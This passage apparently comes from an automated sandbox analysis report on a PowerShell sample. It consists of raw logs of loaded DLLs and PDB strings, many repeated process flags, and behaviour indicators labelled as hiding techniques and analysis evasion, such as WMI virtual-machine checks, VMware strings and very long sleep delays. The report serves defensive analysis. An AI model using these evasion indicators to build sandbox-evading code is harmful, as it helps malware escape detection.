Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2160518841.0000024FF2832000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbs.dll source: powershell.exe, 00000000.00000002.2165780693.0000024FF4C70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbdll source: powershell.exe, 00000000.00000002.2165780693.0000024FF4C70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2162963496.0000024FF482D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb0; source: powershell.exe, 00000000.00000002.2165780693.0000024FF4CD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2165780693.0000024FF4C70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2160518841.0000024FF2832000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbO source: powershell.exe, 00000000.00000002.2162963496.0000024FF487E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.2164653770.0000024FF4B79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2165780693.0000024FF4CD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2162963496.0000024FF487E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2162963496.0000024FF482D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: utomation.pdb source: powershell.exe, 00000000.00000002.2164653770.0000024FF4B79000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848C6D2A5 pushad ; iretd 0_2_00007FF848C6D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848D84FA5 push edi; ret 0_2_00007FF848D84FA6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848D800BD pushad ; iretd 0_2_00007FF848D800C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848FF4430 pushad ; ret 0_2_00007FF848FF4431
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF849035D10 pushad ; ret 0_2_00007FF849035D11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF849034220 push eax; iretd 0_2_00007FF849034221
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF84903CFE4 pushfd ; iretd 0_2_00007FF84903CFE5

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5400Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4494Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5624Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80C28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80C28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineH
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80C28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine`SN
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80C28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80C28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2165780693.0000024FF4CD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWt0%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.2165780693.0000024FF4CA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatusp
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80C28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80C28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80C28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80C28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.2162963496.0000024FF487E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWc
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80C28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
